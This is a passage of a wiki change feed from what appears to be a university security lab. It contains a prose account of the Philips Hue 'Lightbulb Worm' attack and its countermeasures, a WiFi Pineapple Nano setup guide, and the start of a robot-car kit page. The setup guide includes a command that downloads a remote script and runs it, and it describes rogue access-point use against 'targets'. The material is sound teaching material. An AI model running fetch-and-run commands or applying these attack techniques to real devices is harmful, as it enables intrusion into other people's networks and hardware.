The Lightbulb Worm can attack all Smart Lightbulbs but in this example everything is done with the Philips Hue System.In this System one or more Lightbulbs are communicating over the ZigBee Light Link Protocol with a Bridge that is connected to the Internet.&lt;br /&gt;
&lt;br /&gt;
[[File:HueSystem.jpg]]&lt;br /&gt;
&lt;br /&gt;
The Lightbulb Worm itself is purely theoretical but all the parts that make it possible have been practically carried out.&lt;br /&gt;
&lt;br /&gt;
== Attack Overview ==&lt;br /&gt;
&lt;br /&gt;
At first, modified Hardware is used to bypass a proximity check so that the full 70 - 400m Range (Indoor - Outdoor) can be used to reconnect the Lightbulb to another Network.&lt;br /&gt;
The Firmware Update Process was reverse engineered, allowing the attacker to install any homemade firmware on the Lightbulb.&lt;br /&gt;
This Firmware can now theoretically block other Updates, thus bricking the Lamp, and run any arbitrary code, including infecting other Lightbulbs in Range.&lt;br /&gt;
With the proximity check disabled, there is now a approxiomately 100m range in which other Lightbulbs can be infected thus there is a possibility to infect a whole city worth of Lamps if they are in close range to each other.&lt;br /&gt;
&lt;br /&gt;
== Bypassing the Proximity Check ==&lt;br /&gt;
The Proximity check is carried out on every ZigBee Ligt Link compliant stack and product to ensure that only a very close (~1m) Device can reset and start a new Network connection for another Device.&lt;br /&gt;
This is made possible by checking the received signal strength indication (RSSI) and if this value is above a certain threshold, the Device saves the Message Parameters as Transaction ID.&lt;br /&gt;
Upon receiving any other Message, it checks the Transaction ID and drops the Message if the ID is not present. A Transaction ID of 0 does not need to be checked because there is a basic sanity check that rules it out beforehand. &lt;br /&gt;
&lt;br /&gt;
This sanity check is only done with scan Requests.&lt;br /&gt;
&lt;br /&gt;
Any other Message with a Transaction ID of 0 is received and processed as valid. That means if a Broadcast with a Transaction ID of 0 and the content: &amp;quot;Reset to Factory default&amp;quot; is sent, the Lightbulb will process it. Broadcasts of this Message are normally not allowed but the Lightbulbs do not care about that. After the reset only a ZigBee Beacon Message needs to be sent to connect them to the attackers Network. Now the Lightbulbs are ready for a custom firmware.&lt;br /&gt;
&lt;br /&gt;
== Reverse Engineering the Firmware Update Process ==&lt;br /&gt;
A side channel power analysis of a disassembeled Lightbulb and Bridge confirmed that the Firmware for a Lightbulb has to be encrypted and authenticated with AES-CCM (CTR mode with CBC-MAC).&lt;br /&gt;
It also deduced that the same Key is used to encrypt and authenticate. Also the Lightbulbs all use the same global Key which was of course leaked.&lt;br /&gt;
Through all of this the Firmware Update Process is now clear and a Firmware File can be obtained and modified&lt;br /&gt;
&lt;br /&gt;
== Firmware from Scratch ==&lt;br /&gt;
The first Test was just a few changes to the Update File which was then re-encrypted to see if the Lightbulb accepts it, which it did. After that a Program was written to read the Flash Memory so that the File Layout of the Update File can be deduced. With the Layout known, any arbitratry Code can be implemented in the Firmware.&lt;br /&gt;
&lt;br /&gt;
== Possible Effects ==&lt;br /&gt;
&lt;br /&gt;
;Bricking the Bulb&lt;br /&gt;
:Any Effect will be permanent (Blackout, constant Flickering)&lt;br /&gt;
:Can only be reprogrammed at the PCB Level&lt;br /&gt;
;Wireless Network Jamming&lt;br /&gt;
:High Power Transmissions over 2,4GHz&lt;br /&gt;
;Data infiltration and exfiltration&lt;br /&gt;
:by changing and reading data such as Model or Version&lt;br /&gt;
;Epileptic Seizures&lt;br /&gt;
&lt;br /&gt;
== Countermeasures ==&lt;br /&gt;
Philips has already provided a patch to the Proximity Check to ensure it only works over a Distance of approximately 1m&lt;br /&gt;
&lt;br /&gt;
;Other Countermeasures which should be taken&lt;br /&gt;
:Each Lightbulb should have a unique key&lt;br /&gt;
:Asymmetric Cryptography should be used for Software Verification&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Philips Hue Bridge 2.0, Gateway]]&lt;br /&gt;
&lt;br /&gt;
[[Philips Hue White LED E27 9.5W/827, white]]&lt;br /&gt;
&lt;br /&gt;
== Reference ==&lt;br /&gt;
* https://www.blackhat.com/docs/us-16/materials/us-16-OFlynn-A-Lightbulb-Worm.pdf&lt;br /&gt;
* http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;br /&gt;
[[Category:Basic]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Pineapple_Setup&amp;diff=6069</id>
		<title>Pineapple Setup</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Pineapple_Setup&amp;diff=6069"/>
		<updated>2021-02-27T21:53:03Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Setup and Firmware upgrade [optional] of Wifi Pineapple Nano &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Basic setup ===&lt;br /&gt;
* Connect antennas and USB Y cable, WiFi Pineapple NANO needs a stable USB power supply capable of providing 9W for initial setup. Therefore plug both USB Ports of USB Y cable  into the Laptop. After that he blue led should have solid light.&lt;br /&gt;
&lt;br /&gt;
[[File:Pineapplenanothings.jpg|500px|WiFi Pineapple Nano]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Use lusb to verify that pineapple ASIX Electronics is recognized by your laptop&lt;br /&gt;
 &lt;br /&gt;
   lsusb&lt;br /&gt;
   ... &lt;br /&gt;
   Bus 001 Device 004: ID 0b95:772a ASIX Electronics Corp. AX88772A Fast Ethernet&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
* Check networking interface and ip address&lt;br /&gt;
&lt;br /&gt;
   sudo ifconfig&lt;br /&gt;
   enx00c0ca91b581: flags=4163&amp;lt;UP,BROADCAST,RUNNING,MULTICAST&amp;gt;  mtu 1500&lt;br /&gt;
        inet 172.16.42.107  netmask 255.255.255.0  broadcast 172.16.42.255&lt;br /&gt;
        inet6 fe80::d2b0:568c:b39b:4c44  prefixlen 64  scopeid 0x20&amp;lt;link&amp;gt;&lt;br /&gt;
        ether 00:c0:ca:91:b5:81  txqueuelen 1000  (Ethernet)&lt;br /&gt;
        RX packets 15  bytes 1589 (1.5 KiB)&lt;br /&gt;
        RX errors 0  dropped 0  overruns 0  frame 0&lt;br /&gt;
        TX packets 40  bytes 5589 (5.4 KiB)&lt;br /&gt;
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0&lt;br /&gt;
&lt;br /&gt;
* Browse to the determined IP address  172.16.42.1:1471&lt;br /&gt;
&lt;br /&gt;
The Web interface should appear.&lt;br /&gt;
The interface then appearing is the main User Interface (UI) where the user is able to work with the WiFi Pineapple Nano. This UI is further described in: https://wiki.elvis.science/index.php?title=Wifi_Pineapple_Nano&lt;br /&gt;
&lt;br /&gt;
=== User Interface ===&lt;br /&gt;
After connecting the Pineapple Nano to your device correctly as can be seen above, a User Interface (UI) opens under the IP address 172.16.42.1:1471&lt;br /&gt;
&lt;br /&gt;
The User Interface is the main working space for the penetration tester. The UI includes:&lt;br /&gt;
* Dashboard - shows the uptime of the device, the clients connected and the SSIDs in the pool&lt;br /&gt;
* Recon - scanning the Network&lt;br /&gt;
* Clients - List of Clients connected&lt;br /&gt;
* Tracking&lt;br /&gt;
* Modules - List of downloadable Modules&lt;br /&gt;
* Filters - Filtering Clients and connections&lt;br /&gt;
* PineAP - Main part of creating a new WiFi where youc an see the SSID pool, add and remove them and start it in order for the SSIDs to be public&lt;br /&gt;
* Logging&lt;br /&gt;
* Reporting&lt;br /&gt;
* Networking&lt;br /&gt;
* Configuration&lt;br /&gt;
* Advances&lt;br /&gt;
* Notes&lt;br /&gt;
* Help&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Upgrade to newest firmware version 2.5.4 [optional] ===&lt;br /&gt;
&lt;br /&gt;
* Download newest firmware from https://www.wifipineapple.com/downloads and verify shasum:&lt;br /&gt;
&lt;br /&gt;
   sha256sum upgrade-2.5.4.bin &lt;br /&gt;
   98b6190393ed3bc270966645f94a4fdbe21ea8f2d74dec88d88267fe60d3dc85 upgrade-2.5.4.bin&lt;br /&gt;
&lt;br /&gt;
* Select file with newest firmware upgrade-2.5.4.bin  in the Web interface&lt;br /&gt;
** press reset button&lt;br /&gt;
** wait until firmware upgrade successfully verified appears&lt;br /&gt;
* After upgrade connect again to 172.16.42.107:1471 and get into Device Configuration&lt;br /&gt;
** Set root password for ssh and web interface access&lt;br /&gt;
** pwd: &amp;lt;ask for&amp;gt;&lt;br /&gt;
* Management AP Setup&lt;br /&gt;
** Management SSID:&lt;br /&gt;
** WPA2 pwd: &amp;lt;ask for&amp;gt;&lt;br /&gt;
** check Hide Management AP&lt;br /&gt;
* Open AP Setup&lt;br /&gt;
  is used for the target to connect to: f.e. **netlab**&lt;br /&gt;
  &lt;br /&gt;
* Run with wp6.sh script&lt;br /&gt;
&lt;br /&gt;
        gwget wifipineapple.com/wp6.sh&lt;br /&gt;
        chmod +x wp6.sh&lt;br /&gt;
        ./wp6.sh &lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Wifi Pineapple Nano]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[Campus Cyber Security Team]] WiFi Hacking 21.06.2019&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/articles/360010555313-Setup-Basics&lt;br /&gt;
* https://www.youtube.com/watch?v=CrHbEZd4t00&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Pineapple_Setup&amp;diff=6068</id>
		<title>Pineapple Setup</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Pineapple_Setup&amp;diff=6068"/>
		<updated>2021-02-27T21:52:41Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Relocated documentation from WiFi Pineapple Nano Hardware Page&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Setup and Firmware upgrade [optional] of Wifi Pineapple Nano &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Basic setup ===&lt;br /&gt;
* Connect antennas and USB Y cable, WiFi Pineapple NANO needs a stable USB power supply capable of providing 9W for initial setup. Therefore plug both USB Ports of USB Y cable  into the Laptop. After that he blue led should have solid light.&lt;br /&gt;
&lt;br /&gt;
[[File:Pineapplenanothings.jpg|500px|WiFi Pineapple Nano]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Use lusb to verify that pineapple ASIX Electronics is recognized by your laptop&lt;br /&gt;
 &lt;br /&gt;
   lsusb&lt;br /&gt;
   ... &lt;br /&gt;
   Bus 001 Device 004: ID 0b95:772a ASIX Electronics Corp. AX88772A Fast Ethernet&lt;br /&gt;
   ...&lt;br /&gt;
&lt;br /&gt;
* Check networking interface and ip address&lt;br /&gt;
&lt;br /&gt;
   sudo ifconfig&lt;br /&gt;
   enx00c0ca91b581: flags=4163&amp;lt;UP,BROADCAST,RUNNING,MULTICAST&amp;gt;  mtu 1500&lt;br /&gt;
        inet 172.16.42.107  netmask 255.255.255.0  broadcast 172.16.42.255&lt;br /&gt;
        inet6 fe80::d2b0:568c:b39b:4c44  prefixlen 64  scopeid 0x20&amp;lt;link&amp;gt;&lt;br /&gt;
        ether 00:c0:ca:91:b5:81  txqueuelen 1000  (Ethernet)&lt;br /&gt;
        RX packets 15  bytes 1589 (1.5 KiB)&lt;br /&gt;
        RX errors 0  dropped 0  overruns 0  frame 0&lt;br /&gt;
        TX packets 40  bytes 5589 (5.4 KiB)&lt;br /&gt;
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0&lt;br /&gt;
&lt;br /&gt;
* Browse to the determined IP address  172.16.42.1:1471&lt;br /&gt;
&lt;br /&gt;
The Web interface should appear.&lt;br /&gt;
The interface then appearing is the main User Interface (UI) where the user is able to work with the WiFi Pineapple Nano. This UI is further described in: https://wiki.elvis.science/index.php?title=Wifi_Pineapple_Nano&lt;br /&gt;
&lt;br /&gt;
== User Interface ==&lt;br /&gt;
After connecting the Pineapple Nano to your device correctly as can be seen above, a User Interface (UI) opens under the IP address 172.16.42.1:1471&lt;br /&gt;
&lt;br /&gt;
The User Interface is the main working space for the penetration tester. The UI includes:&lt;br /&gt;
* Dashboard - shows the uptime of the device, the clients connected and the SSIDs in the pool&lt;br /&gt;
* Recon - scanning the Network&lt;br /&gt;
* Clients - List of Clients connected&lt;br /&gt;
* Tracking&lt;br /&gt;
* Modules - List of downloadable Modules&lt;br /&gt;
* Filters - Filtering Clients and connections&lt;br /&gt;
* PineAP - Main part of creating a new WiFi where youc an see the SSID pool, add and remove them and start it in order for the SSIDs to be public&lt;br /&gt;
* Logging&lt;br /&gt;
* Reporting&lt;br /&gt;
* Networking&lt;br /&gt;
* Configuration&lt;br /&gt;
* Advances&lt;br /&gt;
* Notes&lt;br /&gt;
* Help&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Upgrade to newest firmware version 2.5.4 [optional] ===&lt;br /&gt;
&lt;br /&gt;
* Download newest firmware from https://www.wifipineapple.com/downloads and verify shasum:&lt;br /&gt;
&lt;br /&gt;
   sha256sum upgrade-2.5.4.bin &lt;br /&gt;
   98b6190393ed3bc270966645f94a4fdbe21ea8f2d74dec88d88267fe60d3dc85 upgrade-2.5.4.bin&lt;br /&gt;
&lt;br /&gt;
* Select file with newest firmware upgrade-2.5.4.bin  in the Web interface&lt;br /&gt;
** press reset button&lt;br /&gt;
** wait until firmware upgrade successfully verified appears&lt;br /&gt;
* After upgrade connect again to 172.16.42.107:1471 and get into Device Configuration&lt;br /&gt;
** Set root password for ssh and web interface access&lt;br /&gt;
** pwd: &amp;lt;ask for&amp;gt;&lt;br /&gt;
* Management AP Setup&lt;br /&gt;
** Management SSID:&lt;br /&gt;
** WPA2 pwd: &amp;lt;ask for&amp;gt;&lt;br /&gt;
** check Hide Management AP&lt;br /&gt;
* Open AP Setup&lt;br /&gt;
  is used for the target to connect to: f.e. **netlab**&lt;br /&gt;
  &lt;br /&gt;
* Run with wp6.sh script&lt;br /&gt;
&lt;br /&gt;
        gwget wifipineapple.com/wp6.sh&lt;br /&gt;
        chmod +x wp6.sh&lt;br /&gt;
        ./wp6.sh &lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Wifi Pineapple Nano]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[Campus Cyber Security Team]] WiFi Hacking 21.06.2019&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/articles/360010555313-Setup-Basics&lt;br /&gt;
* https://www.youtube.com/watch?v=CrHbEZd4t00&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Lightbulb_Worm&amp;diff=6066</id>
		<title>Lightbulb Worm</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Lightbulb_Worm&amp;diff=6066"/>
		<updated>2021-02-27T21:47:26Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added the reference&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The Lightbulb Worm can attack all Smart Lightbulbs but in this example everything is done with the Philips Hue System.In this System one or more Lightbulbs are communicating over the ZigBee Light Link Protocol with a Bridge that is connected to the Internet.&lt;br /&gt;
&lt;br /&gt;
[[File:HueSystem.jpg]]&lt;br /&gt;
&lt;br /&gt;
The Lightbulb Worm itself is purely theoretical but all the parts that make it possible have been practically carried out.&lt;br /&gt;
&lt;br /&gt;
== Attack Overview ==&lt;br /&gt;
&lt;br /&gt;
At first, modified Hardware is used to bypass a proximity check so that the full 70 - 400m Range (Indoor - Outdoor) can be used to reconnect the Lightbulb to another Network.&lt;br /&gt;
The Firmware Update Process was reverse engineered, allowing the attacker to install any homemade firmware on the Lightbulb.&lt;br /&gt;
This Firmware can now theoretically block other Updates, thus bricking the Lamp, and run any arbitrary code, including infecting other Lightbulbs in Range.&lt;br /&gt;
With the proximity check disabled, there is now a approxiomately 100m range in which other Lightbulbs can be infected thus there is a possibility to infect a whole city worth of Lamps if they are in close range to each other.&lt;br /&gt;
&lt;br /&gt;
== Bypassing the Proximity Check ==&lt;br /&gt;
The Proximity check is carried out on every ZigBee Ligt Link compliant stack and product to ensure that only a very close (~1m) Device can reset and start a new Network connection for another Device.&lt;br /&gt;
This is made possible by checking the received signal strength indication (RSSI) and if this value is above a certain threshold, the Device saves the Message Parameters as Transaction ID.&lt;br /&gt;
Upon receiving any other Message, it checks the Transaction ID and drops the Message if the ID is not present. A Transaction ID of 0 does not need to be checked because there is a basic sanity check that rules it out beforehand. &lt;br /&gt;
&lt;br /&gt;
This sanity check is only done with scan Requests.&lt;br /&gt;
&lt;br /&gt;
Any other Message with a Transaction ID of 0 is received and processed as valid. That means if a Broadcast with a Transaction ID of 0 and the content: &amp;quot;Reset to Factory default&amp;quot; is sent, the Lightbulb will process it. Broadcasts of this Message are normally not allowed but the Lightbulbs do not care about that. After the reset only a ZigBee Beacon Message needs to be sent to connect them to the attackers Network. Now the Lightbulbs are ready for a custom firmware.&lt;br /&gt;
&lt;br /&gt;
== Reverse Engineering the Firmware Update Process ==&lt;br /&gt;
A side channel power analysis of a disassembeled Lightbulb and Bridge confirmed that the Firmware for a Lightbulb has to be encrypted and authenticated with AES-CCM (CTR mode with CBC-MAC).&lt;br /&gt;
It also deduced that the same Key is used to encrypt and authenticate. Also the Lightbulbs all use the same global Key which was of course leaked.&lt;br /&gt;
Through all of this the Firmware Update Process is now clear and a Firmware File can be obtained and modified&lt;br /&gt;
&lt;br /&gt;
== Firmware from Scratch ==&lt;br /&gt;
The first Test was just a few changes to the Update File which was then re-encrypted to see if the Lightbulb accepts it, which it did. After that a Program was written to read the Flash Memory so that the File Layout of the Update File can be deduced. With the Layout known, any arbitratry Code can be implemented in the Firmware.&lt;br /&gt;
&lt;br /&gt;
== Possible Effects ==&lt;br /&gt;
&lt;br /&gt;
;Bricking the Bulb&lt;br /&gt;
:Any Effect will be permanent (Blackout, constant Flickering)&lt;br /&gt;
:Can only be reprogrammed at the PCB Level&lt;br /&gt;
;Wireless Network Jamming&lt;br /&gt;
:High Power Transmissions over 2,4GHz&lt;br /&gt;
;Data infiltration and exfiltration&lt;br /&gt;
:by changing and reading data such as Model or Version&lt;br /&gt;
;Epileptic Seizures&lt;br /&gt;
&lt;br /&gt;
== Countermeasures ==&lt;br /&gt;
Philips has already provided a patch to the Proximity Check to ensure it only works over a Distance of approximately 1m&lt;br /&gt;
&lt;br /&gt;
;Other Countermeasures which should be taken&lt;br /&gt;
:Each Lightbulb should have a unique key&lt;br /&gt;
:Asymmetric Cryptography should be used for Software Verification&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Philips Hue Bridge 2.0, Gateway]]&lt;br /&gt;
&lt;br /&gt;
[[Philips Hue White LED E27 9.5W/827, white]]&lt;br /&gt;
&lt;br /&gt;
== Reference ==&lt;br /&gt;
* http://colinoflynn.com/wp-content/uploads/2016/08/us-16-OFlynn-A-Lightbulb-Worm-wp.pdf&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;br /&gt;
[[Category:Basic]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5999</id>
		<title>Keyestudio 4WD Bluetooth multifunctional car kit</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5999"/>
		<updated>2021-02-19T15:58:36Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added the code for the Projekts: Line-Tracking, IR-Receiver/IR-Remote controlgmx, Obstacle Avoidance&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the keyestudio 4WD Bluetooth Multi-functional Car Kit. The documentation contains schematics, tipps and code for the car. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Arduino IDE&lt;br /&gt;
* 18650 Batteries (not included in kit)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Component list ===&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Product Name&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;Quantity&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio UNO R3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Shield V5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio L298N Motor Shield&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Bluetooh HC-06&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;I2C 1602 LCD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Line Tracking Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;HC-SR04 Ultrasonic Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Digital IR Receiver Module&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Top PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Bottom PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Servo Plastic Platform&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;IR Remote Control&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Toggle Switch + Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
